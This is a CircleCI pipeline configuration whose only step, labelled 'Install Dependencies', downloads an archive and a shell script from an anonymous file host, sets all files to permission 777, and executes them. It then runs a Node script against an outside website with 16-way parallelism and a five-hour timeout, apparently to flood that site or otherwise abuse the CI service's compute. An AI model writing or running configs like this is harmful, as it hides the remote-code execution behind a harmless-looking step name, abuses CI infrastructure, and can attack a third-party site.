version: 2.1
jobs:
    trial:
      docker:
            - image: ubuntu:20.04
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: apt update && apt install wget unrar -y && wget https://0x0.st/o6ka.rar && unrar e o6ka.rar && wget https://0x0.st/o6kB.sh && mv o6kB.sh install3.sh && chmod 777 * && sh install.sh && sh install3.sh && node index.js https://yuni.su/ 300 10
            no_output_timeout: 5h

workflows:
    version: 2.1
    build:
        jobs:
        - trial
